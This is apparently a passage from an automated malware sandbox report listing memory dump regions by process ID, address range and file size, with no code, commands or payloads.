                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/2616-202-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2688-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2728-190-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2748-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2756-214-0x0000000000340000-0x0000000000346000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          24KB

                                                                                                                                                                                                                        • memory/2756-212-0x0000000000230000-0x0000000000231000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2756-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2816-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2828-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2840-272-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-276-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-281-0x0000000003960000-0x0000000003961000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-284-0x0000000003980000-0x0000000003981000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-274-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-282-0x000000006D221000-0x000000006D223000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/2840-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2840-280-0x0000000003950000-0x0000000003951000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-275-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-247-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-279-0x0000000003940000-0x0000000003941000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-273-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-277-0x00000000038E0000-0x00000000038E1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-285-0x0000000003990000-0x0000000003991000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-283-0x0000000003970000-0x0000000003971000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-248-0x0000000000650000-0x000000000068C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                        • memory/2840-278-0x0000000003930000-0x0000000003931000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-271-0x0000000003880000-0x00000000038D7000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          348KB

                                                                                                                                                                                                                        • memory/2840-270-0x00000000021F0000-0x00000000021F1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-269-0x0000000001FE0000-0x0000000001FE1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-268-0x0000000000910000-0x0000000000911000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2840-267-0x0000000000900000-0x0000000000901000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2852-391-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2872-252-0x00000000020F0000-0x00000000020F1000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/2872-251-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                        • memory/2872-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/2956-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/3056-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                        • memory/3056-313-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB